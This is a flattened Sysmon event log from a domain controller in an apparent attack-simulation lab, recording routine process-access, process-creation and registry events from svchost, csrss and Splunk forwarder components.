13:57:05.572{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008053Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:05.572{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008052Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:05.572{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008051Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:05.572{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008050Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:05.572{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008049Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:05.572{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008048Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:05.572{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008047Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:05.572{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{10ACEC4A-8631-5FCF-6001-000000009101}4744C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008046Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:05.572{10ACEC4A-85E9-5FCF-1B01-000000009101}18402620C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{10ACEC4A-8631-5FCF-6001-000000009101}4744C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000008045Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:05.573{10ACEC4A-8631-5FCF-6001-000000009101}4744C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{10ACEC4A-85E9-5FCF-1B01-000000009101}1840C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000008044Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:05.229{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-8631-5FCF-5F01-000000009101}2324\\?\C:\Windows\system32\wbem\WMIADAP.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008043Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:05.213{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008042Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:05.213{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008041Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:05.213{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008040Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:05.213{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008039Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:05.213{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{10ACEC4A-8631-5FCF-5F01-000000009101}2324\\?\C:\Windows\system32\wbem\WMIADAP.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008038Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:05.213{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008037Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:05.213{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008036Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:05.213{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008035Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:05.213{10ACEC4A-8541-5FCF-1000-000000009101}11562120C:\Windows\system32\svchost.exe{10ACEC4A-8631-5FCF-5F01-000000009101}2324\\?\C:\Windows\system32\wbem\WMIADAP.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\wbem\wmisvc.dll+2624|c:\windows\system32\wbem\wmisvc.dll+2491|C:\Windows\SYSTEM32\ntdll.dll+7d87d|C:\Windows\SYSTEM32\ntdll.dll+3a979|C:\Windows\SYSTEM32\ntdll.dll+1e86f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008034Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:05.213{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008033Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:05.213{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000008032Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:57:05.198{10ACEC4A-8541-5FCF-1200-000000009101}1212C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d6cd6a-0x02d88b72) 10341000x80000000000000008031Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:05.026{10ACEC4A-8630-5FCF-5E01-000000009101}13524988C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{10ACEC4A-85E9-5FCF-1B01-000000009101}1840C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008072Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:06.385{10ACEC4A-8632-5FCF-6101-000000009101}45684528C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{10ACEC4A-85E9-5FCF-1B01-000000009101}1840C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008071Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:06.244{10ACEC4A-85E9-5FCF-1F01-000000009101}31363920C:\Windows\system32\conhost.exe{10ACEC4A-8632-5FCF-6101-000000009101}4568C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008070Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:06.244{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008069Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 